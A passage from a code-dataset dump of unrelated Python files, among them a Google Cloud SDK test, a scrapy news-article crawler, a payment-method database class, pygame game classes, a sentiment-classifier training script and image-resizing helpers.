counter = counter + 1;\n while(beepLine()):\n forward(1,1)\n else:\n forward(1,1)\n \n \nstuff() \n \n","sub_path":"sequentialWorld.py","file_name":"sequentialWorld.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"515472920","text":"# -*- coding: utf-8 -*- #\n# Copyright 2015 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for rolling-updates list-instance-updates command.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.util import apis as core_apis\nfrom googlecloudsdk.core import properties\n\nfrom tests.lib import test_case\nfrom tests.lib.surface.compute import rolling_updates_base as base\n\nmessages = core_apis.GetMessagesModule('replicapoolupdater', 'v1beta1')\n\n\nclass UpdatesListInstanceUpdatesTest(base.UpdaterMockTest):\n\n def testListInstanceUpdates(self):\n self.mocked_client_v1beta1.rollingUpdates.ListInstanceUpdates.Expect(\n messages.ReplicapoolupdaterRollingUpdatesListInstanceUpdatesRequest(\n project=self.Project(),\n zone=base.ZONE,\n rollingUpdate='some-update',\n maxResults=100,\n ),\n messages.InstanceUpdateList(\n items=[\n messages.InstanceUpdate(\n instance='http://instances/some-instance-1',\n status='ROLLED_OUT',\n ),\n messages.InstanceUpdate(\n instance='http://instances/some-instance-2',\n status='ROLLING_OUT',\n ),\n ],\n nextPageToken='1396059067464',\n ),\n )\n self.mocked_client_v1beta1.rollingUpdates.ListInstanceUpdates.Expect(\n messages.ReplicapoolupdaterRollingUpdatesListInstanceUpdatesRequest(\n project=self.Project(),\n zone=base.ZONE,\n rollingUpdate='some-update',\n pageToken='1396059067464',\n maxResults=100,\n ),\n messages.InstanceUpdateList(\n items=[\n messages.InstanceUpdate(\n instance='http://instances/some-instance-3',\n status='ROLLING_OUT',\n ),\n messages.InstanceUpdate(\n instance='http://instances/some-instance-4',\n status='ROLLED_OUT',\n ),\n ],\n nextPageToken=None,\n ),\n )\n\n self.Run(('alpha compute rolling-updates '\n '--zone=some-zone list-instance-updates some-update'))\n self.AssertOutputContains(\"\"\"\\\nINSTANCE_NAME STATUS\nsome-instance-1 ROLLED_OUT\nsome-instance-2 ROLLING_OUT\nsome-instance-3 ROLLING_OUT\nsome-instance-4 ROLLED_OUT\n\"\"\")\n\n def testListInstanceUpdates_Failure_MissingArgument_Zone(self):\n try:\n self.Run(\n 'alpha compute rolling-updates list-instance-updates some-update')\n self.fail('Expected exception has not been raised')\n except properties.RequiredPropertyError:\n self.AssertErrContains('required property [zone] is not currently set')\n\n\nif __name__ == '__main__':\n test_case.main()\n","sub_path":"google-cloud-sdk/lib/tests/unit/surface/compute/rolling_updates/list_instance_updates_test.py","file_name":"list_instance_updates_test.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"283541095","text":"# -*- coding: utf-8 -*-\n\nimport traceback\nfrom scrapy import Request\nfrom scrapy_redis.spiders import RedisSpider\nfrom crawler.consts import (TOP_LEVEL_QUEUE_WORKER_KEY, SECOND_LEVEL_QUEUE_WORKER_KEY,\n TOP_LEVEL_QUEUE_WORKER_KEY_CATE, CRAWLED_ARTICLE_SET, COME_FROM_ARTICLE_SET, LOG_PREFIX_ARTICLE_WORKER, GIF_ARTICLE_SET)\nfrom crawler.settings import raven_client\nfrom crawler.extractor import article_parser_readability, extract_data, normalize_title, upinsert_google_article_category\nfrom crawler.spiders.base import PreSavingMixin, UrlExtracorMixin, UrlFilterMixin\nfrom crawler.utils import gen_url_domain,get_main_domain\nfrom crawler.logging import log_error, log_analysis, log_warn, log_access, log_access_article_worker_index\nfrom crawler.image_extractor import is_photo_url\nfrom crawler.html_improver import HtmlImprover\nfrom crawler.models import SiteRule\n\nfrom nlp.classifier import (EnArticleClassifier, TYPE_ERROR, TYPE_PHOTO, TYPE_VIDEO,\n TYPE_ARTICLE)\nfrom bs4 import BeautifulSoup\n\n\nen_article_clf = EnArticleClassifier.get_instance()\n\n\nclass ArticleWorker(PreSavingMixin, UrlExtracorMixin, UrlFilterMixin, RedisSpider):\n\n redis_key = None\n name = None\n next_level_queue_key = None\n\n handle_httpstatus_list = [404]\n\n def parse(self, response):\n url = response.url\n item = {}\n try:\n log_access_article_worker_index('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1000', 'parse start', str(url)))\n if response.status == 404:\n self.add_to_crawled_set(url)\n log_warn('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1010', '404 page', str(url)))\n return item\n\n if self.is_in_crawled_set(url):\n log_warn('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1020', 'duplicated crawled', str(url)))\n #upinsert_google_article_category(url, self.server)\n return item\n self.add_to_crawled_set(url)\n html_content = ''\n try:\n html_content = response.body_as_unicode()\n except Exception as e:\n log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1070', 'response body error', str(url), traceback.format_exc()))\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1070', 'response body error', str(url), traceback.format_exc()))\n\n html_soup = BeautifulSoup(html_content, 'lxml')\n redirects = html_soup.select('meta[http-equiv=\"refresh\"]')\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1030', 'is redirects', str(url), str(redirects)))\n if redirects:\n redirect = redirects[0]\n redirect_params = redirect.get('content')\n if redirect_params:\n split_params = redirect_params.lower().split('url=')\n if len(split_params) > 1:\n _r_url = split_params[-1]\n domain = gen_url_domain(url)\n redirect_url = _r_url if _r_url.startswith('http') else 'http://%s%s' % (domain, _r_url) \\\n if _r_url.startswith('/') else 'http://%s/%s' % (domain, _r_url)\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1040', 'redirects url', str(url), str(redirect_url)))\n url_cate = self.server.hget(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, url)\n if url_cate:\n self.server.hdel(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, url)\n self.server.hset(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, redirect_url, url_cate)\n return Request(redirect_url, callback=self.parse, dont_filter=True)\n\n title, content = article_parser_readability(html_content)\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1050', 'article title', str(url), str(title)))\n if not title:\n log_error('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1060', 'title empty', str(url)))\n return item\n content_soup = BeautifulSoup(content, 'lxml')\n\n domain = gen_url_domain(url)\n\n img_src = None\n try:\n title, img_src, content_soup = HtmlImprover(title, domain, html_soup, content_soup, url).get_ans()\n except Exception as e:\n log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1070', 'html improver error', str(url), traceback.format_exc()))\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1070', 'html improver error', str(url), traceback.format_exc()))\n\n # 标准化title 去除video等不合适字符\n title = normalize_title(url, title)\n log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1080', 'normalize after', str(url), str(title), str(img_src)))\n content = str(content_soup)\n\n is_check = True\n is_photo_url_rst = is_photo_url(url, html_soup)\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1110', 'is photo site', str(url), str(is_photo_url_rst)))\n if is_photo_url_rst:\n is_check = False\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1120', 'is check', str(url), str(is_check)))\n\n base_list = ['data-src', 'src']\n\n if img_src:\n base_list.insert(0, img_src)\n\n content_text = content_soup.text.replace(\n '\\t', '').replace(\n '\\n', '').replace(\n '\\r', '').replace(\n u'\\u00A0', ' ').strip()\n\n if not content_text and is_check:\n log_error('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1090', 'no content', str(url)))\n return item\n\n if not en_article_clf.check_valid_by_language('%s' % (title)) and is_check:\n log_error('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1100', 'title language not english', str(url)))\n return item\n\n if not en_article_clf.check_valid_by_language('%s %s' % (title, content_text)) and is_check:\n log_error('%s : %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1100_10', 'content language not english', str(url)))\n return item\n\n scripts = html_soup.find_all('script')\n for tag in scripts:\n tag.decompose()\n\n styles = html_soup.find_all('style')\n for tag in styles:\n tag.decompose()\n\n html_content = ''.join(html_soup.stripped_strings)\n\n\n site_type = ''\n cate = ''\n try:\n site_type, cate = en_article_clf.check_site_type_and_cate(html_soup, html_content, title, content_soup, content_text, url, is_check)\n except Exception as e:\n log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1130', 'check site type and category error', str(url), traceback.format_exc()))\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1130', 'check site type and category error', str(url), traceback.format_exc()))\n\n log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1140', 'site type and category', str(url), str(site_type), str(cate)))\n\n if site_type == TYPE_ERROR:\n log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1150', 'type error', str(url), str(site_type)))\n return item\n\n url_cate = self.server.hget(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, url)\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1160', 'site type and category', str(url), str(url_cate)))\n\n if url_cate:\n self.server.hdel(TOP_LEVEL_QUEUE_WORKER_KEY_CATE, url)\n cate = url_cate\n\n item['ctype'] = site_type\n item['url'] = url\n\n if site_type in [TYPE_VIDEO]:\n log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1170', 'site_type is video', str(url), str(site_type)))\n return item\n\n try:\n data = extract_data(url, html_soup, html_content, content_soup, content, base_list)\n except Exception as e:\n log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1180', 'extract data error', str(url), traceback.format_exc()))\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1180', 'extract data error', str(url), traceback.format_exc()))\n raise\n\n data['title'] = title\n data['text'] = content_text\n\n data['cate'] = en_article_clf.gen_full_cates(cate)\n item['data'] = data\n\n mainDomain = get_main_domain(domain)\n log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1190', 'site domain and mainDomain', str(url), str(domain), str(mainDomain)))\n\n current_site_name = None\n for d in [domain, mainDomain]:\n current_site_name, quality, entertaining = SiteRule.get_rule_by_domain(d)\n if current_site_name:\n break\n\n is_in_come_from_set = self.server.sismember(COME_FROM_ARTICLE_SET, url)\n log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1200', 'site come from and site name', str(url), str(is_in_come_from_set), str(current_site_name)))\n\n is_gif_set = self.server.sismember(GIF_ARTICLE_SET, url)\n log_access_article_worker_index('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1201', 'site come from and site name', str(url), str(is_in_come_from_set), str(current_site_name)))\n\n if not current_site_name and is_in_come_from_set == False and is_gif_set == False:\n log_error('%s : %s %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1210', 'article site domain not in db', str(url), str(site_type), str(is_in_come_from_set)))\n return\n # if current_site_name == 'Business Today':\n # return item\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1220', 'article item', str(url), repr(item)))\n except Exception as e:\n log_error('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1999', 'article worker error', str(url), traceback.format_exc()))\n log_access_article_worker_index('%s : %s %s %s %s' % (LOG_PREFIX_ARTICLE_WORKER, 'AW_1999', 'article worker error', str(url), traceback.format_exc()))\n return item\n\nclass TopLevelWorker(ArticleWorker):\n name = 'top_worker'\n redis_key = TOP_LEVEL_QUEUE_WORKER_KEY\n next_level_queue_key = SECOND_LEVEL_QUEUE_WORKER_KEY\n\nclass SecondLevelWorker(ArticleWorker):\n name = 'second_worker'\n redis_key = SECOND_LEVEL_QUEUE_WORKER_KEY\n next_level_queue_key = SECOND_LEVEL_QUEUE_WORKER_KEY\n","sub_path":"chaos/crawler/spiders/article_worker.py","file_name":"article_worker.py","file_ext":"py","file_size_in_byte":11400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"17369922","text":"from config.dbconfig import pg_config\nimport psycopg2\n\n\nclass PayMethodDAO:\n def __init__(self):\n\n connection_url = \"dbname=%s user=%s password=%s\" % (pg_config['dbname'],\n pg_config['user'],\n pg_config['passwd'])\n self.conn = psycopg2._connect(connection_url)\n\n def getAllPayMethod(self):\n cursor = self.conn.cursor()\n query = \"select * from paymethod;\"\n cursor.execute(query)\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def getPayMethodById(self, payid):\n cursor = self.conn.cursor()\n query = \"select * from paymethod where pay_id = %s;\"\n cursor.execute(query, (payid,))\n result = cursor.fetchone()\n return result\n\n def getPayMethodByName(self, pmname):\n cursor = self.conn.cursor()\n query = \"select * from pay_method where pmname = %s;\"\n cursor.execute(query, (pmname,))\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def getConsumerByPayMethodId(self, pmid):\n cursor = self.conn.cursor()\n query = \"select consid, consusername from consumer natural inner join pay_method where pmid = %s;\"\n cursor.execute(query, (pmid,))\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def getSupplierByPayMethodId(self, pmid):\n cursor = self.conn.cursor()\n query = \"select sid, susername, scompany from supplier natural inner join pay_method where pmid = %s;\"\n cursor.execute(query, (pmid,))\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def insert(self, card_no, first_name, last_name, exp_date, consumer_id):\n cursor = self.conn.cursor()\n query = \"insert into paymethod(card_no, first_name, last_name, exp_date, consumer_id) \" \\\n \"values (%s, %s, %s, %s, %s) returning pay_id;\"\n cursor.execute(query, (card_no, first_name, last_name, exp_date, consumer_id,))\n pay_id = cursor.fetchone()[0]\n self.conn.commit()\n return pay_id\n\n def update(self, pmid, pmname):\n cursor = self.conn.cursor()\n query = \"update pay_method set pmname = %s where pmid = %s;\"\n cursor.execute(query, (pmname, pmid,))\n self.conn.commit()\n return pmid\n\n def delete(self, pmid):\n cursor = self.conn.cursor()\n query = \"delete from pay_method where pmid = %s;\"\n cursor.execute(query, (pmid,))\n self.conn.commit()\n return pmid\n","sub_path":"dao/paymethod.py","file_name":"paymethod.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"119788828","text":"def maxium_sub_arr(arr,low,high):\n if low == high - 1:\n return (low,high,arr[low])\n mid = int((low + high)/2)\n left = maxium_sub_arr(arr,low,mid)\n right = maxium_sub_arr(arr,mid,high)\n cross = maxium_cross_sub_arr(arr,low,mid,high)\n if left[2] >= right[2] and left[2] >= cross[2]:\n return left\n elif right[2] >= left[2] and right[2] >= cross[2]:\n return right\n else:\n return cross\n\ndef maxium_cross_sub_arr(arr,low,mid,high):\n left_sum = float(\"-inf\")\n sum = 0\n i = mid\n while i >= low:\n sum = sum + arr[i]\n if sum > left_sum:\n left_sum = sum\n max_left = i\n i = i - 1\n\n right_sum = float(\"-inf\")\n sum = 0\n j = mid + 1\n while j <= high:\n sum = sum + arr[j]\n if sum > right_sum:\n right_sum = sum\n max_right = j\n j = j + 1\n return max_left,max_right,left_sum+right_sum\n\nsample = [13,-3,-25,20,-3,-16,-23,18,20,-7,12,-5,-22,15,-4,7]\nprint(maxium_sub_arr(sample,0,len(sample)-1))","sub_path":"algorithm/maxium_sub_arr.py","file_name":"maxium_sub_arr.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"59019233","text":"import pygame\n\nblocks = [] # List to hold the blocks\ntiles = [] # List to hold the tiles\nliquids = [] # List to hold the liquid tiles\n\nclass Block(object):\n\t\n\tdef __init__(self, pos):\n\t\tblocks.append(self)\n\t\tself.rect = pygame.Rect(pos[0], pos[1], 32, 32)\n\nclass Tile(Block):\n\n\tdef __init__(self, pos):\n\t\ttiles.append(self)\n\t\tself.rect = pygame.Rect(pos[0], pos[1], 32, 32)\n\nclass Liquid(Block):\n\n\tdef __init__(self, pos, liquidType):\n\t\tself.rect = pygame.Rect(pos[0], pos[1], 32, 32)\n\t\tself.type = liquidType\n\t\tself.effects = \"none\"\n\t\tif self.type == \"water\":\n\t\t\tself.effects = \"none\"\n\t\telif self.type == \"spring\":\n\t\t\tself.effects = \"regen\"\n\t\telif self.type == \"lava\":\n\t\t\tself.effects = \"fireDamage\"\n\t\telse:\n\t\t\tself.effects = \"none\"\n\tdef applyEffects(self, player):\n\t\tplayer.effects.append(self.effects)","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"262654532","text":"import random\ndef Test():\n n=int(input())\n nums=eval(\"[\"+input().strip().replace(\" \",\",\")+\"]\")\n nums.sort()\n save=[]\n for x in nums:\n save.append(x)\n result=n\n jump=False\n i=1\n while(i<=n and len(nums)>1):\n temp=min(nums)\n if(i>temp):\n if(check(i,nums)):\n nums.remove(temp)\n save.remove(temp)\n i=i-1\n else:\n result=i\n jump=True\n break\n else:\n nums.remove(temp)\n i=i+1\n if(jump):\n print(result)\n else:\n a=random.randint(0,2)\n print(len(save))\n if(a==1):\n print(save)\n\ndef check(i,nums):\n for x in nums:\n if(x>=i):\n return True\n return False\nif __name__ == \"__main__\":\n Test()","sub_path":"Code/CodeRecords/2786/60595/251518.py","file_name":"251518.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"195578793","text":"from sklearn.metrics import classification_report\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nimport pickle\n\ndata_df = pd.read_csv('data/final.csv')\n# remove the \"Neutral\" class\ndata_df = data_df[data_df['sentiment'] != \"neutral\"]\n\n# change values to numeric\ndata_df['sentiment'] = data_df['sentiment'].map({'positive': 1, 'negative': 0})\n\n# idneitfy the data and the labels\ndata = data_df['text']\ntarget = data_df['sentiment']\n\ndata_df = data_df.dropna()\n\n# Use TfidfVectorizer for feature extraction (TFIDF to convert textual data to numeric form):\ntf_vec = TfidfVectorizer()\nX = tf_vec.fit_transform(data)\n\n# Training Phase\nX_train, X_test, y_train, y_test = train_test_split(X, target, test_size=0.50, random_state=0)\n\n\n\nmlp =MLPClassifier(hidden_layer_sizes=(13,13,13),max_iter=500)\nmlp.fit(X_train,y_train)\npredictions = mlp.predict(X_test)\nprint(mlp.predict(X_test))\nprint(classification_report(y_test,predictions))\n\nwith open(\"models/arabic_sentiment_NN_tokenizer.pickle\", \"wb\") as f:\n pickle.dump(tf_vec, f)\nwith open(\"models/arabic_sentiment_NN.pickle\", \"wb\") as f:\n pickle.dump(mlp, f)","sub_path":"mlp_model.py","file_name":"mlp_model.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"568741847","text":"# coding=utf-8\n__author__ = 'pythme'\n\n\"\"\"\n\n可以直接作用于for循环的对象统称为可迭代对象:Iterable\n \n isinstance()判断一个对象是否是Iterable对象\n >>> from collections import Iterable\n >>> isinstance([], Iterable)\n True\n >>> isinstance({}, Iterable)\n True\n >>> isinstance('abc', Iterable)\n True\n >>> isinstance((x for x in range(10)), Iterable)\n True\n >>> isinstance(100, Iterable)\n False\n \n 生成器不但可以作用于for循环,还可以被next()函数不断调用并返回下一个值.\n 直到最后抛出StopIteration错误表示无法继续返回下一个值了,故 生成器就是可迭代对象 \n\n【可以被next()函数调用并不断返回下一个值的对象称为迭代器:Iterator】\n\n 生成器都是Iterator对象,但list、dict、str虽然是Iterable,却不是Iterator。\n\n 把list、dict、str等Iterable变成Iterator可以使用iter()函数\n >>> isinstance(iter([]), Iterator)\n True\n >>> isinstance(iter('abc'), Iterator)\n True\n\n\nIterator甚至可以表示一个无限大的数据流,Iterator对象可以被next()函数调用并不断返回下一个数据,直到没有数据时抛出StopIteration错误。\n例如全体自然数。而使用list是永远不可能存储全体自然数的。\n\n\"\"\"\n\n\n\"\"\"\n【总结】\n\n凡是可作用于for循环的对象都是Iterable类型;\n凡是可作用于next()函数的对象都是Iterator类型,它们表示一个惰性计算的序列;生成器即是可迭代对象的迭代器\n\n集合数据类型如list、dict、str等是Iterable但不是Iterator,不过可以通过iter()函数获得一个Iterator对象。\nPython的for循环本质上就是通过不断调用next()函数实现的。\n\n for x in [1, 2, 3, 4, 5]:\n pass\n 实际上完全等价于:\n \n # 首先获得Iterator对象:\n it = iter([1, 2, 3, 4, 5])\n # 循环:\n while True:\n try:\n # 获得下一个值:\n x = next(it)\n except StopIteration:\n # 遇到StopIteration就退出循环\n break\n\n\"\"\"\n\n","sub_path":"4_高级特性/4_Iterator.py","file_name":"4_Iterator.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"97874523","text":"# -*-coding:utf-8 -*\nimport pygame\nfrom graphalama.borg import Borg\nborg_baby = Borg()\n\npygame.init()\npygame.key.set_repeat(50, 5)\n\n\nclass Inputs(dict):\n \"\"\"permet de connaitre tous les inputs\n contient A, B, X, Y, DOWN, UP, RIGHT, LEFT, QUIT et PAUSE\"\"\"\n\n def __init__(self):\n\n # noinspection PyTypeChecker\n dict.__init__(self)\n\n # simplification\n key_dict = {'is pressed': False, 'just pressed': False, 'press time': -1}\n\n # keyboard\n self['right arrow'] = dict(key_dict)\n self['left arrow'] = dict(key_dict)\n self['up arrow'] = dict(key_dict)\n self['down arrow'] = dict(key_dict)\n self['space bar'] = dict(key_dict)\n self['tab'] = dict(key_dict)\n self['enter'] = dict(key_dict)\n self['F12'] = dict(key_dict)\n self['alt'] = dict(key_dict)\n self['F4'] = dict(key_dict)\n self['close'] = dict(key_dict)\n self['escape'] = dict(key_dict)\n # mouse click\n self['left click'] = dict(key_dict)\n self['middle click'] = dict(key_dict)\n self['right click'] = dict(key_dict)\n\n # special\n self['screen'] = {'change': False, 'size': (0, 0), 'fullscreen': True}\n self['mouse'] = {'real x': 0, 'real y': 0, 'rel x': 0, 'rel y': 0, 'scroll': 0}\n\n self.list_events = []\n\n self['screen']['size'] = borg_baby.SCREEN_SIZE\n\n @property\n def mouse_click(self):\n # if there's a click somewhere\n return self['left click']['just pressed'] or self['middle click']['just pressed'] or self['right click'][\n 'just pressed']\n\n def press(self, key):\n self[key]['is pressed'] = True\n self[key]['just pressed'] = True\n self[key]['press time'] = 0\n\n def unpress(self, key):\n self[key]['is pressed'] = False\n self[key]['just pressed'] = False\n self[key]['press time'] = -1\n\n def update(self):\n\n self.list_events = pygame.event.get()\n\n mouse_pos = pygame.mouse.get_pos()\n self['mouse']['real x'] = mouse_pos[0]\n self['mouse']['real y'] = mouse_pos[1]\n self['mouse']['rel x'] = mouse_pos[0] / self['screen']['size'][0] # I can't be more precise\n self['mouse']['rel y'] = mouse_pos[1] / self['screen']['size'][1] # idem\n self['mouse']['scroll'] = 0\n\n # we reset every 'just pressed' values so you wont think x) that the key is pressed twice or more\n for key, sub_dict in self.items():\n if sub_dict.__contains__('just pressed'): # normally it's has_key() but strangely it doesn'T work\n sub_dict['just pressed'] = False\n self['screen']['change'] = False\n\n # On incrément tous les compteurs if needed\n for key, sub_dict in self.items():\n if sub_dict.__contains__('is pressed'):\n if sub_dict['is pressed']:\n sub_dict['press time'] += 1\n\n for event in self.list_events:\n # la tit' croix\n if event.type == pygame.QUIT: # on verifie le type d'event\n self['close']['is pressed'] = True\n\n # clavier\n # appui sur une touche\n if event.type == pygame.KEYDOWN: # on verifie le type d'event\n if event.key == pygame.K_RIGHT: # on test pour connaitre la touche\n self.press('right arrow')\n elif event.key == pygame.K_LEFT: # on test pour connaitre la touche\n self.press('left arrow')\n elif event.key == pygame.K_UP:\n self.press('up arrow')\n elif event.key == pygame.K_DOWN:\n self.press('down arrow')\n elif event.key == pygame.K_SPACE:\n self.press('space bar')\n elif (event.key == pygame.K_RALT or event.key == pygame.K_LALT):\n self.press('alt')\n elif event.key == pygame.K_F4: # on test pour connaitre la touche\n self.press('F4')\n elif event.key == pygame.K_RETURN or event.key == pygame.K_KP_ENTER:\n self.press('enter')\n elif event.key == pygame.K_F12:\n self.press('F12')\n elif event.key == pygame.K_TAB:\n self.press('tab')\n elif event.key == pygame.K_ESCAPE:\n self.press('escape')\n # touche relachée\n elif event.type == pygame.KEYUP: # on verifie le type d'event\n if event.key == pygame.K_RIGHT: # on test pour connaitre la touche\n self.unpress('right arrow')\n elif event.key == pygame.K_LEFT: # on test pour connaitre la touche\n self.unpress('left arrow')\n elif event.key == pygame.K_UP: # on test pour connaitre la touche\n self.unpress('up arrow')\n elif event.key == pygame.K_SPACE:\n self.unpress('space bar')\n elif event.key == pygame.K_DOWN: # on test pour connaitre la touche\n self.unpress('down arrow')\n elif event.key == pygame.K_RETURN or event.key == pygame.K_KP_ENTER:\n self.unpress('enter')\n elif event.key == pygame.K_F12:\n self.unpress('F12')\n elif event.key == pygame.K_TAB:\n self.unpress('tab')\n elif event.key == pygame.K_ESCAPE:\n self.unpress('escape')\n\n\n # les clics\n elif event.type == pygame.MOUSEBUTTONDOWN: # on verifie le type d'event\n if event.button == 1: # on test pour connaitre le bouton 1 = gauche\n self.press('left click')\n elif event.button == 2: # on test pour connaitre le bouton 2 = clic mollette\n self.press('middle click')\n elif event.button == 3: # on test pour connaitre le bouton 3 = clic droit\n self.press('right click')\n elif event.button == 4:\n self['mouse']['scroll'] = -1\n elif event.button == 5:\n self['mouse']['scroll'] = 1\n elif event.type == pygame.MOUSEBUTTONUP: # on verifie le type d'event\n if event.button == 1: # on test pour connaitre le bouton 1 = gauche\n self.unpress('left click')\n if event.button == 2: # on test pour connaitre le bouton 2 = clic mollette\n self.unpress('middle click')\n if event.button == 3: # on test pour connaitre le bouton 3 = clic droit\n self.unpress('right click')\n # le changement de taille de fenetre\n elif event.type == pygame.VIDEORESIZE: # on verifie le type d'event\n self['screen']['change'] = True\n self['screen']['size'] = event.size\n\n__all__ = ['Inputs']\n","sub_path":"graphalama/inputs.py","file_name":"inputs.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"287102939","text":"import os\nfrom os.path import join\nimport glob\nimport shutil\nimport cv2\nfrom utils import automkdir\n\n'''\nGeneral purpose pre-processing functions up until training begins.\n'''\n\n# Copies images from one directory to another\ndef copy_to_loc(path, stop, name='new_folder', img_format='png'):\n folders = sorted(glob.glob(join(path, '*')))\n print(\"Folder list: {}\".format(folders))\n for folder in folders:\n save_path = join(folder, name)\n automkdir(save_path)\n img_path = join(folder, 'truth_downsize_2')\n imgs = sorted(glob.glob(join(img_path, '*.{}'.format(img_format))))\n for i in range(stop):\n shutil.copy2(imgs[i], save_path)\n print(\"Successfully copied the first {} files from {} into {}\"\n .format(stop, img_path, save_path))\n\n\n\n'''This function accepts an input path, scale, name and image format as parameters\nIt finds all of the folders in the input path and for each folder, it will resize each of the\nground-truth images by the scale factor and save the files according to the name supplied'''\ndef resize_imgs_truth(path, scale=0.5, name='resize', img_format='png'):\n folders = sorted(glob.glob(join(path, '*')))\n # print(\"Folder list: {}\".format(folders))\n for folder in folders:\n save_path = join(folder, name)\n automkdir(save_path)\n # print(\"Saved directory is: {}\".format(save_path))\n img_path = join(folder, 'truth')\n # print(\"Input path: {}\".format(img_path))\n imgs = sorted(glob.glob(join(img_path, '*.{}'.format(img_format))))\n # print(os.listdir(img_path))\n for img in range(len(imgs)):\n original = cv2.imread(imgs[img], cv2.IMREAD_UNCHANGED)\n modified = cv2.resize(original, (0, 0), fx=scale, fy=scale)\n filename = os.listdir(img_path)[img]\n cv2.imwrite(join(save_path, filename), modified)\n # print(filename)\n print('Successfully resized {} images by a scale of {} at {}'.format(len(imgs), scale, save_path))\n return print('Resize images concluded')\n\n\n# Resize images by half using the resize method\ndef resize_img(img_path, scale=0.5):\n original = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)\n # print(\"original shape: {}\".format(original.shape))\n modified = cv2.resize(original, (0, 0), fx=scale, fy=scale)\n # print(\"modified shape: {}\".format(modified.shape))\n # cv2.imshow('Original', 